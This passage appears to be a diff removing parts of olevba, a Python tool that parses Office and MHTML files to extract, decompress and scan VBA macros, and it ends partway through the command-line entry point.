- try:
- if isinstance(data,bytes):
- data = data.decode('utf8', 'backslashreplace')
- # parse the MIME content
- # remove any leading whitespace or newline (workaround for issue in email package)
- stripped_data = data.lstrip('\r\n\t ')
- # strip any junk from the beginning of the file
- # (issue #31 fix by Greg C - gdigreg)
- # TODO: improve keywords to avoid false positives
- mime_offset = stripped_data.find('MIME')
- content_offset = stripped_data.find('Content')
- # if "MIME" is found, and located before "Content":
- if -1 < mime_offset <= content_offset:
- stripped_data = stripped_data[mime_offset:]
- # else if "Content" is found, and before "MIME"
- # TODO: can it work without "MIME" at all?
- elif content_offset > -1:
- stripped_data = stripped_data[content_offset:]
- # TODO: quick and dirty fix: insert a standard line with MIME-Version header?
- mhtml = email.message_from_string(stripped_data)
- # find all the attached files:
- for part in mhtml.walk():
- content_type = part.get_content_type() # always returns a value
- fname = part.get_filename(None) # returns None if it fails
- # TODO: get content-location if no filename
- log.debug('MHTML part: filename=%r, content-type=%r' % (fname, content_type))
- part_data = part.get_payload(decode=True)
- # VBA macros are stored in a binary file named "editdata.mso".
- # the data content is an OLE container for the VBA project, compressed
- # using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
- # decompress the zlib data starting at offset 0x32, which is the OLE container:
- # check ActiveMime header:
-
- if (isinstance(part_data, str) or isinstance(part_data, bytes)) and is_mso_file(part_data):
- log.debug('Found ActiveMime header, decompressing MSO container')
- try:
- ole_data = mso_file_extract(part_data)
-
- # TODO: check if it is actually an OLE file
- # TODO: get the MSO filename from content_location?
- self.ole_subfiles.append(
- VBA_Parser(filename=fname, data=ole_data,
- relaxed=self.relaxed))
- except OlevbaBaseException as exc:
- if self.relaxed:
- log.info('%s does not contain a valid OLE file (%s)'
- % (fname, exc))
- log.debug('Trace:', exc_info=True)
- # TODO: bug here - need to split in smaller functions/classes?
- else:
- raise SubstreamOpenError(self.filename, fname, exc)
- else:
- log.debug('type(part_data) = %s' % type(part_data))
- try:
- log.debug('part_data[0:20] = %r' % part_data[0:20])
- except TypeError as err:
- log.debug('part_data has no __getitem__')
- # set type only if parsing succeeds
- self.type = TYPE_MHTML
- except OlevbaBaseException:
- raise
- except Exception:
- log.info('Failed MIME parsing for file %r - %s'
- % (self.filename, MSG_OLEVBA_ISSUES))
- log.debug('Trace:', exc_info=True)
-
- def open_ppt(self):
- """ try to interpret self.ole_file as PowerPoint 97-2003 using PptParser
-
- Although self.ole_file is a valid olefile.OleFileIO, we set
- self.ole_file = None in here and instead set self.ole_subfiles to the
- VBA ole streams found within the main ole file. That makes most of the
- code below treat this like an OpenXML file and only look at the
- ole_subfiles (except find_vba_* which needs to explicitly check for
- self.type)
- """
-
- log.info('Check whether OLE file is PPT')
- ppt_parser.enable_logging()
- try:
- ppt = ppt_parser.PptParser(self.ole_file, fast_fail=True)
- for vba_data in ppt.iter_vba_data():
- self.ole_subfiles.append(VBA_Parser(None, vba_data,
- container='PptParser'))
- log.info('File is PPT')
- self.ole_file.close() # just in case
- self.ole_file = None # required to make other methods look at ole_subfiles
- self.type = TYPE_PPT
- except Exception as exc:
- if self.container == 'PptParser':
-                # this is a subfile of a ppt --> to be expected that it is not a ppt
- log.debug('PPT subfile is not a PPT file')
- else:
- log.debug("File appears not to be a ppt file (%s)" % exc)
-
-
- def open_text(self, data):
- """
- Open a text file containing VBA or VBScript source code
- :param data: file contents in a string or bytes
- :return: nothing
- """
- log.info('Opening text file %s' % self.filename)
- # directly store the source code:
- if isinstance(data,bytes):
- data=data.decode('utf8','backslashreplace')
- self.vba_code_all_modules = data
- self.contains_macros = True
- # set type only if parsing succeeds
- self.type = TYPE_TEXT
-
-
- def find_vba_projects(self):
- """
- Finds all the VBA projects stored in an OLE file.
-
- Return None if the file is not OLE but OpenXML.
- Return a list of tuples (vba_root, project_path, dir_path) for each VBA project.
- vba_root is the path of the root OLE storage containing the VBA project,
- including a trailing slash unless it is the root of the OLE file.
- project_path is the path of the OLE stream named "PROJECT" within the VBA project.
- dir_path is the path of the OLE stream named "VBA/dir" within the VBA project.
-
- If this function returns an empty list for one of the supported formats
- (i.e. Word, Excel, Powerpoint), then the file does not contain VBA macros.
-
- :return: None if OpenXML file, list of tuples (vba_root, project_path, dir_path)
- for each VBA project found if OLE file
- """
- log.debug('VBA_Parser.find_vba_projects')
-
- # if the file is not OLE but OpenXML, return None:
- if self.ole_file is None and self.type != TYPE_PPT:
- return None
-
- # if this method has already been called, return previous result:
- if self.vba_projects is not None:
- return self.vba_projects
-
- # if this is a ppt file (PowerPoint 97-2003):
- # self.ole_file is None but the ole_subfiles do contain vba_projects
- # (like for OpenXML files).
- if self.type == TYPE_PPT:
-            # TODO: so far, this function is never called for PPT files, but
-            # if that happens, the information about which OLE file contains
-            # which storage is lost!
- log.warning('Returned info is not complete for PPT types!')
- self.vba_projects = []
- for subfile in self.ole_subfiles:
- self.vba_projects.extend(subfile.find_vba_projects())
- return self.vba_projects
-
- # Find the VBA project root (different in MS Word, Excel, etc):
- # - Word 97-2003: Macros
- # - Excel 97-2003: _VBA_PROJECT_CUR
- # - PowerPoint 97-2003: PptParser has identified ole_subfiles
- # - Word 2007+: word/vbaProject.bin in zip archive, then the VBA project is the root of vbaProject.bin.
- # - Excel 2007+: xl/vbaProject.bin in zip archive, then same as Word
- # - PowerPoint 2007+: ppt/vbaProject.bin in zip archive, then same as Word
- # - Visio 2007: not supported yet (different file structure)
-
- # According to MS-OVBA section 2.2.1:
- # - the VBA project root storage MUST contain a VBA storage and a PROJECT stream
- # - The root/VBA storage MUST contain a _VBA_PROJECT stream and a dir stream
- # - all names are case-insensitive
-
- def check_vba_stream(ole, vba_root, stream_path):
- full_path = vba_root + stream_path
- if ole.exists(full_path) and ole.get_type(full_path) == olefile.STGTY_STREAM:
- log.debug('Found %s stream: %s' % (stream_path, full_path))
- return full_path
- else:
- log.debug('Missing %s stream, this is not a valid VBA project structure' % stream_path)
- return False
-
- # start with an empty list:
- self.vba_projects = []
- # Look for any storage containing those storage/streams:
- ole = self.ole_file
- for storage in ole.listdir(streams=False, storages=True):
- log.debug('Checking storage %r' % storage)
- # Look for a storage ending with "VBA":
- if storage[-1].upper() == 'VBA':
- log.debug('Found VBA storage: %s' % ('/'.join(storage)))
- vba_root = '/'.join(storage[:-1])
- # Add a trailing slash to vba_root, unless it is the root of the OLE file:
- # (used later to append all the child streams/storages)
- if vba_root != '':
- vba_root += '/'
- log.debug('Checking vba_root="%s"' % vba_root)
-
- # Check if the VBA root storage also contains a PROJECT stream:
- project_path = check_vba_stream(ole, vba_root, 'PROJECT')
- if not project_path: continue
- # Check if the VBA root storage also contains a VBA/_VBA_PROJECT stream:
- vba_project_path = check_vba_stream(ole, vba_root, 'VBA/_VBA_PROJECT')
- if not vba_project_path: continue
- # Check if the VBA root storage also contains a VBA/dir stream:
- dir_path = check_vba_stream(ole, vba_root, 'VBA/dir')
- if not dir_path: continue
- # Now we are pretty sure it is a VBA project structure
- log.debug('VBA root storage: "%s"' % vba_root)
- # append the results to the list as a tuple for later use:
- self.vba_projects.append((vba_root, project_path, dir_path))
- return self.vba_projects
-
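The MS-OVBA 2.2.1 structure checks performed by `find_vba_projects` can be condensed into a standalone sketch. `find_vba_roots` and `FakeOle` are hypothetical names used for illustration only; the sketch assumes nothing beyond the `listdir`/`exists`/`get_type` calls of `olefile.OleFileIO` and olefile's `STGTY_STREAM` value:

```python
STGTY_STREAM = 2  # same value as olefile.STGTY_STREAM

def find_vba_roots(ole):
    """Yield (vba_root, project_path, dir_path) for each storage whose layout
    satisfies MS-OVBA 2.2.1: a VBA storage plus PROJECT, VBA/_VBA_PROJECT
    and VBA/dir streams."""
    for storage in ole.listdir(streams=False, storages=True):
        # a VBA project root is the parent of a storage named "VBA":
        if storage[-1].upper() != 'VBA':
            continue
        vba_root = '/'.join(storage[:-1])
        if vba_root:
            vba_root += '/'  # trailing slash unless it is the root of the OLE file
        paths = [vba_root + p for p in ('PROJECT', 'VBA/_VBA_PROJECT', 'VBA/dir')]
        if all(ole.exists(p) and ole.get_type(p) == STGTY_STREAM for p in paths):
            yield (vba_root, paths[0], paths[2])

class FakeOle:
    """Duck-typed stand-in for olefile.OleFileIO, for illustration only."""
    def __init__(self, storages, streams):
        self.storages, self.streams = storages, streams
    def listdir(self, streams=False, storages=True):
        return self.storages
    def exists(self, path):
        return path in self.streams
    def get_type(self, path):
        return STGTY_STREAM
```

With a real file, `FakeOle` would be replaced by `olefile.OleFileIO(filename)`; the rest of the logic is identical.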
- def detect_vba_macros(self):
- """
- Detect the potential presence of VBA macros in the file, by checking
- if it contains VBA projects. Both OLE and OpenXML files are supported.
-
- Important: for now, results are accurate only for Word, Excel and PowerPoint
-
- Note: this method does NOT attempt to check the actual presence or validity
- of VBA macro source code, so there might be false positives.
- It may also detect VBA macros in files embedded within the main file,
- for example an Excel workbook with macros embedded into a Word
- document without macros may be detected, without distinction.
-
- :return: bool, True if at least one VBA project has been found, False otherwise
- """
- #TODO: return None or raise exception if format not supported
- #TODO: return the number of VBA projects found instead of True/False?
- # if this method was already called, return the previous result:
- if self.contains_macros is not None:
- return self.contains_macros
- # if OpenXML/PPT, check all the OLE subfiles:
- if self.ole_file is None:
- for ole_subfile in self.ole_subfiles:
- if ole_subfile.detect_vba_macros():
- self.contains_macros = True
- return True
- # otherwise, no macro found:
- self.contains_macros = False
- return False
- # otherwise it's an OLE file, find VBA projects:
- vba_projects = self.find_vba_projects()
- if len(vba_projects) == 0:
- self.contains_macros = False
- else:
- self.contains_macros = True
- # Also look for VBA code in any stream including orphans
- # (happens in some malformed files)
- ole = self.ole_file
- for sid in xrange(len(ole.direntries)):
- # check if id is already done above:
- log.debug('Checking DirEntry #%d' % sid)
- d = ole.direntries[sid]
- if d is None:
- # this direntry is not part of the tree: either unused or an orphan
- d = ole._load_direntry(sid)
- log.debug('This DirEntry is an orphan or unused')
- if d.entry_type == olefile.STGTY_STREAM:
- # read data
- log.debug('Reading data from stream %r - size: %d bytes' % (d.name, d.size))
- try:
- data = ole._open(d.isectStart, d.size).read()
- log.debug('Read %d bytes' % len(data))
- if len(data) > 200:
- log.debug('%r...[much more data]...%r' % (data[:100], data[-50:]))
- else:
- log.debug(repr(data))
- if 'Attribut' in data.decode('utf-8', 'ignore'):
- log.debug('Found VBA compressed code')
- self.contains_macros = True
- except IOError as exc:
- if self.relaxed:
- log.info('Error when reading OLE Stream %r' % d.name)
-                        log.debug('Trace:', exc_info=True)
- else:
- raise SubstreamOpenError(self.filename, d.name, exc)
- return self.contains_macros
-
- def extract_macros(self):
- """
- Extract and decompress source code for each VBA macro found in the file
-
- Iterator: yields (filename, stream_path, vba_filename, vba_code) for each VBA macro found
- If the file is OLE, filename is the path of the file.
- If the file is OpenXML, filename is the path of the OLE subfile containing VBA macros
- within the zip archive, e.g. word/vbaProject.bin.
-        If the file is PPT, results are as for OpenXML, but the filename is not meaningful.
- """
- log.debug('extract_macros:')
- if self.ole_file is None:
- # This may be either an OpenXML/PPT or a text file:
- if self.type == TYPE_TEXT:
- # This is a text file, yield the full code:
- yield (self.filename, '', self.filename, self.vba_code_all_modules)
- else:
- # OpenXML/PPT: recursively yield results from each OLE subfile:
- for ole_subfile in self.ole_subfiles:
- for results in ole_subfile.extract_macros():
- yield results
- else:
- # This is an OLE file:
- self.find_vba_projects()
- # set of stream ids
- vba_stream_ids = set()
- for vba_root, project_path, dir_path in self.vba_projects:
- # extract all VBA macros from that VBA root storage:
- for stream_path, vba_filename, vba_code in \
- _extract_vba(self.ole_file, vba_root, project_path,
- dir_path, self.relaxed):
- # store direntry ids in a set:
- vba_stream_ids.add(self.ole_file._find(stream_path))
- yield (self.filename, stream_path, vba_filename, vba_code)
- # Also look for VBA code in any stream including orphans
- # (happens in some malformed files)
- ole = self.ole_file
- for sid in xrange(len(ole.direntries)):
- # check if id is already done above:
- log.debug('Checking DirEntry #%d' % sid)
- if sid in vba_stream_ids:
- log.debug('Already extracted')
- continue
- d = ole.direntries[sid]
- if d is None:
- # this direntry is not part of the tree: either unused or an orphan
- d = ole._load_direntry(sid)
- log.debug('This DirEntry is an orphan or unused')
- if d.entry_type == olefile.STGTY_STREAM:
- # read data
- log.debug('Reading data from stream %r' % d.name)
- data = ole._open(d.isectStart, d.size).read()
- for match in re.finditer(b'\\x00Attribut[^e]', data, flags=re.IGNORECASE):
- start = match.start() - 3
- log.debug('Found VBA compressed code at index %X' % start)
- compressed_code = data[start:]
- try:
- vba_code = decompress_stream(compressed_code)
- yield (self.filename, d.name, d.name, vba_code)
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.debug('Error processing stream %r in file %r (%s)' % (d.name, self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- # do not raise the error, as it is unlikely to be a compressed macro stream
-
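The compressed-VBA signature search used in `extract_macros` above can be sketched on its own; `looks_like_compressed_vba` is a hypothetical helper name, not part of olevba's API:

```python
import re

# Compressed VBA source always contains "Attribut" preceded by a \x00 byte;
# the trailing "e" of "Attribute" is clipped by a compression token, hence
# the [^e] in the pattern (the same signature used by extract_macros above).
VBA_SIG = re.compile(rb'\x00Attribut[^e]', re.IGNORECASE)

def looks_like_compressed_vba(data):
    """Return the offsets of candidate compressed VBA containers in a raw
    OLE stream: the container starts 3 bytes before the \x00 marker."""
    return [max(m.start() - 3, 0) for m in VBA_SIG.finditer(data)]
```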
- def extract_all_macros(self):
- """
- Extract and decompress source code for each VBA macro found in the file
- by calling extract_macros(), store the results as a list of tuples
- (filename, stream_path, vba_filename, vba_code) in self.modules.
- See extract_macros for details.
- """
- if self.modules is None:
- self.modules = []
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_macros():
- self.modules.append((subfilename, stream_path, vba_filename, vba_code))
- self.nb_macros = len(self.modules)
- return self.modules
-
-
-
- def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
- """
-        Runs extract_all_macros and analyzes the source code of all VBA macros
-        found in the file.
- """
- if self.detect_vba_macros():
- # if the analysis was already done, avoid doing it twice:
- if self.analysis_results is not None:
- return self.analysis_results
- # variable to merge source code from all modules:
- if self.vba_code_all_modules is None:
- self.vba_code_all_modules = ''
- for (_, _, _, vba_code) in self.extract_all_macros():
- #TODO: filter code? (each module)
- self.vba_code_all_modules += vba_code.decode('utf-8', 'ignore') + '\n'
- for (_, _, form_string) in self.extract_form_strings():
- self.vba_code_all_modules += form_string.decode('utf-8', 'ignore') + '\n'
- # Analyze the whole code at once:
- scanner = VBA_Scanner(self.vba_code_all_modules)
- self.analysis_results = scanner.scan(show_decoded_strings, deobfuscate)
- autoexec, suspicious, iocs, hexstrings, base64strings, dridex, vbastrings = scanner.scan_summary()
- self.nb_autoexec += autoexec
- self.nb_suspicious += suspicious
- self.nb_iocs += iocs
- self.nb_hexstrings += hexstrings
- self.nb_base64strings += base64strings
- self.nb_dridexstrings += dridex
- self.nb_vbastrings += vbastrings
-
- return self.analysis_results
-
-
- def reveal(self):
- # we only want printable strings:
- analysis = self.analyze_macros(show_decoded_strings=False)
- # to avoid replacing short strings contained into longer strings, we sort the analysis results
- # based on the length of the encoded string, in reverse order:
- analysis = sorted(analysis, key=lambda type_decoded_encoded: len(type_decoded_encoded[2]), reverse=True)
- # normally now self.vba_code_all_modules contains source code from all modules
- deobf_code = self.vba_code_all_modules
- for kw_type, decoded, encoded in analysis:
- if kw_type == 'VBA string':
-                #print '%3d occurrences: %r => %r' % (deobf_code.count(encoded), encoded, decoded)
- # need to add double quotes around the decoded strings
- # after escaping double-quotes as double-double-quotes for VBA:
- decoded = decoded.replace('"', '""')
- deobf_code = deobf_code.replace(encoded, '"%s"' % decoded)
- return deobf_code
-        #TODO: re-run the analysis several times if hex or base64 strings are revealed
-
-
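The longest-first substitution order used by `reveal` can be isolated into a minimal sketch (`reveal_strings` is a hypothetical name, not olevba API):

```python
def reveal_strings(code, analysis):
    """Replace encoded strings by their decoded values, longest encoded
    string first, so that short encoded strings embedded in longer ones
    are not replaced prematurely (the same ordering used by reveal)."""
    ordered = sorted(analysis, key=lambda row: len(row[2]), reverse=True)
    for kw_type, decoded, encoded in ordered:
        if kw_type == 'VBA string':
            # escape double quotes VBA-style (doubled) before quoting:
            decoded = decoded.replace('"', '""')
            code = code.replace(encoded, '"%s"' % decoded)
    return code
```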
- def find_vba_forms(self):
- """
- Finds all the VBA forms stored in an OLE file.
-
- Return None if the file is not OLE but OpenXML.
-        Return a list of storage paths (as lists of strings) for each VBA form found.
-        Each such storage contains the MS-OFORMS streams "o" and "f" that describe
-        the form and its embedded controls.
-
- If this function returns an empty list for one of the supported formats
- (i.e. Word, Excel, Powerpoint), then the file does not contain VBA forms.
-
-        :return: None if OpenXML file, list of storage paths for each VBA form
-                 found if OLE file
- """
- log.debug('VBA_Parser.find_vba_forms')
-
- # if the file is not OLE but OpenXML, return None:
- if self.ole_file is None and self.type != TYPE_PPT:
- return None
-
- # if this method has already been called, return previous result:
-        # if self.vba_forms is not None:
-        #     return self.vba_forms
-
- # According to MS-OFORMS section 2.1.2 Control Streams:
- # - A parent control, that is, a control that can contain embedded controls,
- # MUST be persisted as a storage that contains multiple streams.
- # - All parent controls MUST contain a FormControl. The FormControl
- # properties are persisted to a stream (1) as specified in section 2.1.1.2.
- # The name of this stream (1) MUST be "f".
- # - Embedded controls that cannot themselves contain other embedded
- # controls are persisted sequentially as FormEmbeddedActiveXControls
- # to a stream (1) contained in the same storage as the parent control.
- # The name of this stream (1) MUST be "o".
- # - all names are case-insensitive
-
- if self.type == TYPE_PPT:
-            # TODO: so far, this function is never called for PPT files, but
-            # if that happens, the information about which OLE file contains
-            # which storage is lost!
- ole_files = self.ole_subfiles
- log.warning('Returned info is not complete for PPT types!')
- else:
- ole_files = [self.ole_file, ]
-
- # start with an empty list:
- self.vba_forms = []
-
- # Loop over ole streams
- for ole in ole_files:
- # Look for any storage containing those storage/streams:
- for storage in ole.listdir(streams=False, storages=True):
- log.debug('Checking storage %r' % storage)
- # Look for two streams named 'o' and 'f':
- o_stream = storage + ['o']
- f_stream = storage + ['f']
- log.debug('Checking if streams %r and %r exist' % (f_stream, o_stream))
- if ole.exists(o_stream) and ole.get_type(o_stream) == olefile.STGTY_STREAM \
- and ole.exists(f_stream) and ole.get_type(f_stream) == olefile.STGTY_STREAM:
- form_path = '/'.join(storage)
- log.debug('Found VBA Form: %r' % form_path)
- self.vba_forms.append(storage)
- return self.vba_forms
-
- def extract_form_strings(self):
- """
- Extract printable strings from each VBA Form found in the file
-
-        Iterator: yields (filename, stream_path, form_string) for each printable
-        string found in a form.
-        If the file is OLE, filename is the path of the file.
-        If the file is OpenXML, filename is the path of the OLE subfile containing
-        VBA forms within the zip archive, e.g. word/vbaProject.bin.
-        If the file is PPT, results are as for OpenXML, but the filename is not meaningful.
- """
- if self.ole_file is None:
- # This may be either an OpenXML/PPT or a text file:
- if self.type == TYPE_TEXT:
- # This is a text file, return no results:
- return
- else:
- # OpenXML/PPT: recursively yield results from each OLE subfile:
- for ole_subfile in self.ole_subfiles:
- for results in ole_subfile.extract_form_strings():
- yield results
- else:
- # This is an OLE file:
- self.find_vba_forms()
- ole = self.ole_file
- for form_storage in self.vba_forms:
- o_stream = form_storage + ['o']
- log.debug('Opening form object stream %r' % '/'.join(o_stream))
- form_data = ole.openstream(o_stream).read()
- # Extract printable strings from the form object stream "o":
- for m in re_printable_string.finditer(form_data):
- log.debug('Printable string found in form: %r' % m.group())
- yield (self.filename, '/'.join(o_stream), m.group())
-
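String extraction from a form's "o" stream boils down to a printable-run scan. The pattern below is an assumption standing in for olevba's `re_printable_string` (the real pattern is more involved), and `form_strings` is a hypothetical name:

```python
import re

# assumed stand-in for re_printable_string: runs of 4+ printable ASCII bytes
re_printable = re.compile(rb'[\x20-\x7e]{4,}')

def form_strings(form_data):
    """Return the printable strings found in a raw form "o" stream."""
    return [m.group().decode('ascii') for m in re_printable.finditer(form_data)]
```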
-
- def close(self):
- """
- Close all the open files. This method must be called after usage, if
- the application is opening many files.
- """
- if self.ole_file is None:
- if self.ole_subfiles is not None:
- for ole_subfile in self.ole_subfiles:
- ole_subfile.close()
- else:
- self.ole_file.close()
-
-
-
-class VBA_Parser_CLI(VBA_Parser):
- """
- VBA parser and analyzer, adding methods for the command line interface
- of olevba. (see VBA_Parser)
- """
-
- def __init__(self, *args, **kwargs):
- """
- Constructor for VBA_Parser_CLI.
- Calls __init__ from VBA_Parser with all arguments --> see doc there
- """
- super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
-
-
- def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code, and print the results in a table
-
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- :return: None
- """
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r')
- sys.stdout.flush()
- results = self.analyze_macros(show_decoded_strings, deobfuscate)
- if results:
- t = prettytable.PrettyTable(('Type', 'Keyword', 'Description'))
- t.align = 'l'
- t.max_width['Type'] = 10
- t.max_width['Keyword'] = 20
- t.max_width['Description'] = 39
- for kw_type, keyword, description in results:
- # handle non printable strings:
- if not is_printable(keyword):
- keyword = repr(keyword)
- if not is_printable(description):
- description = repr(description)
- t.add_row((kw_type, keyword, description))
- print(t)
- else:
- print('No suspicious keyword or IOC found.')
-
- def print_analysis_json(self, show_decoded_strings=False, deobfuscate=False):
- """
- Analyze the provided VBA code, and return the results in json format
-
- :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
- :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
-
- :return: dict
- """
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r')
- sys.stdout.flush()
- return [dict(type=kw_type, keyword=keyword, description=description)
- for kw_type, keyword, description in self.analyze_macros(show_decoded_strings, deobfuscate)]
-
- def process_file(self, show_decoded_strings=False,
- display_code=True, hide_attributes=True,
- vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
- """
- Process a single file
-
-        :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
-        :param display_code: bool, if False VBA source code is not displayed (default True)
-        :param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
-        :param vba_code_only: bool, if True only the VBA source code is displayed, without analysis (default False)
-        :param show_deobfuscated_code: bool, if True display the macro source code with deobfuscated strings (default False)
-        :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- """
- #TODO: replace print by writing to a provided output file (sys.stdout by default)
- # fix conflicting parameters:
- if vba_code_only and not display_code:
- display_code = True
- if self.container:
- display_filename = '%s in %s' % (self.filename, self.container)
- else:
- display_filename = self.filename
- print('=' * 79)
- print('FILE:', display_filename)
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- print('Type: %s' % self.type)
- if self.detect_vba_macros():
- #print 'Contains VBA Macros:'
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
- if hide_attributes:
- # hide attribute lines:
-                        if isinstance(vba_code, bytes):
-                            vba_code = vba_code.decode('utf-8', 'backslashreplace')
- vba_code_filtered = filter_vba(vba_code)
- else:
- vba_code_filtered = vba_code
- print('-' * 79)
- print('VBA MACRO %s ' % vba_filename)
- print('in file: %s - OLE stream: %s' % (subfilename, repr(stream_path)))
- if display_code:
- print('- ' * 39)
- # detect empty macros:
- if vba_code_filtered.strip() == '':
- print('(empty macro)')
- else:
- print(vba_code_filtered)
- for (subfilename, stream_path, form_string) in self.extract_form_strings():
- print('-' * 79)
- print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
- print('- ' * 39)
- print(form_string.decode('utf-8', 'ignore'))
- if not vba_code_only:
- # analyse the code from all modules at once:
- self.print_analysis(show_decoded_strings, deobfuscate)
- if show_deobfuscated_code:
- print('MACRO SOURCE CODE WITH DEOBFUSCATED VBA STRINGS (EXPERIMENTAL):\n\n')
- print(self.reveal())
- else:
- print('No VBA macros found.')
- except OlevbaBaseException:
- raise
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.info('Error processing file %s (%s)' % (self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- raise ProcessingError(self.filename, exc)
- print('')
-
-
- def process_file_json(self, show_decoded_strings=False,
- display_code=True, hide_attributes=True,
- vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
- """
- Process a single file
-
- every "show" or "print" here is to be translated as "add to json"
-
-        :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
-        :param display_code: bool, if False VBA source code is not displayed (default True)
-        :param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
-        :param vba_code_only: bool, if True only the VBA source code is displayed, without analysis (default False)
-        :param show_deobfuscated_code: bool, if True display the macro source code with deobfuscated strings (default False)
-        :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
- """
- #TODO: fix conflicting parameters (?)
-
- if vba_code_only and not display_code:
- display_code = True
-
- result = {}
-
- if self.container:
- result['container'] = self.container
- else:
- result['container'] = None
- result['file'] = self.filename
- result['json_conversion_successful'] = False
- result['analysis'] = None
- result['code_deobfuscated'] = None
- result['do_deobfuscate'] = deobfuscate
-
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- result['type'] = self.type
- macros = []
- if self.detect_vba_macros():
- for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
- curr_macro = {}
- if hide_attributes:
- # hide attribute lines:
-                        if isinstance(vba_code, bytes):
-                            vba_code = vba_code.decode('utf-8', 'backslashreplace')
-                        vba_code_filtered = filter_vba(vba_code)
- else:
- vba_code_filtered = vba_code
-
- curr_macro['vba_filename'] = vba_filename
- curr_macro['subfilename'] = subfilename
- curr_macro['ole_stream'] = stream_path
- if display_code:
- curr_macro['code'] = vba_code_filtered.strip()
- else:
- curr_macro['code'] = None
- macros.append(curr_macro)
- if not vba_code_only:
- # analyse the code from all modules at once:
- result['analysis'] = self.print_analysis_json(show_decoded_strings,
- deobfuscate)
- if show_deobfuscated_code:
- result['code_deobfuscated'] = self.reveal()
- result['macros'] = macros
- result['json_conversion_successful'] = True
- except Exception as exc:
- # display the exception with full stack trace for debugging
- log.info('Error processing file %s (%s)' % (self.filename, exc))
- log.debug('Traceback:', exc_info=True)
- raise ProcessingError(self.filename, exc)
-
- return result
-
-
- def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
- """
- Process a file in triage mode, showing only summary results on one line.
- """
- #TODO: replace print by writing to a provided output file (sys.stdout by default)
- try:
- #TODO: handle olefile errors, when an OLE file is malformed
- if self.detect_vba_macros():
- # print a waiting message only if the output is not redirected to a file:
- if sys.stdout.isatty():
- print('Analysis...\r', end='')
- sys.stdout.flush()
- self.analyze_macros(show_decoded_strings=show_decoded_strings,
- deobfuscate=deobfuscate)
- flags = TYPE2TAG[self.type]
- macros = autoexec = suspicious = iocs = hexstrings = base64obf = dridex = vba_obf = '-'
- if self.contains_macros: macros = 'M'
- if self.nb_autoexec: autoexec = 'A'
- if self.nb_suspicious: suspicious = 'S'
- if self.nb_iocs: iocs = 'I'
- if self.nb_hexstrings: hexstrings = 'H'
- if self.nb_base64strings: base64obf = 'B'
- if self.nb_dridexstrings: dridex = 'D'
- if self.nb_vbastrings: vba_obf = 'V'
- flags += '%s%s%s%s%s%s%s%s' % (macros, autoexec, suspicious, iocs, hexstrings,
- base64obf, dridex, vba_obf)
-
- line = '%-12s %s' % (flags, self.filename)
- print(line)
-
- # old table display:
- # macros = autoexec = suspicious = iocs = hexstrings = 'no'
- # if nb_macros: macros = 'YES:%d' % nb_macros
- # if nb_autoexec: autoexec = 'YES:%d' % nb_autoexec
- # if nb_suspicious: suspicious = 'YES:%d' % nb_suspicious
- # if nb_iocs: iocs = 'YES:%d' % nb_iocs
- # if nb_hexstrings: hexstrings = 'YES:%d' % nb_hexstrings
- # # 2nd line = info
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % (self.type, macros, autoexec, suspicious, iocs, hexstrings)
- except Exception as exc:
- # display the exception with full stack trace for debugging only
- log.debug('Error processing file %s (%s)' % (self.filename, exc),
- exc_info=True)
- raise ProcessingError(self.filename, exc)
-
-
- # t = prettytable.PrettyTable(('filename', 'type', 'macros', 'autoexec', 'suspicious', 'ioc', 'hexstrings'),
- # header=False, border=False)
- # t.align = 'l'
- # t.max_width['filename'] = 30
- # t.max_width['type'] = 10
- # t.max_width['macros'] = 6
- # t.max_width['autoexec'] = 6
- # t.max_width['suspicious'] = 6
- # t.max_width['ioc'] = 6
- # t.max_width['hexstrings'] = 6
- # t.add_row((filename, ftype, macros, autoexec, suspicious, iocs, hexstrings))
- # print t
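The one-line triage summary above packs eight indicators into a fixed-width flag string. A sketch of that encoding (`triage_flags` is a hypothetical name, not part of olevba):

```python
def triage_flags(counts):
    """Encode the triage indicators as one letter each, in the order used
    above: Macros, Autoexec, Suspicious, IOCs, Hex strings, Base64,
    Dridex, VBA strings; '-' marks an absent indicator."""
    letters = 'MASIHBDV'
    return ''.join(l if c else '-' for l, c in zip(letters, counts))
```

For example, a file with macros, suspicious keywords and IOCs but nothing else yields the flag string `M-SI----`.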
-
-
-#=== MAIN =====================================================================
-
-def main():
- """
- Main function, called when olevba is run from the command line
- """
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
-    usage = 'usage: %prog [options] <filename> [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- # parser.add_option('-o', '--outfile', dest='outfile',
- # help='output file')
- # parser.add_option('-c', '--csv', dest='csv',
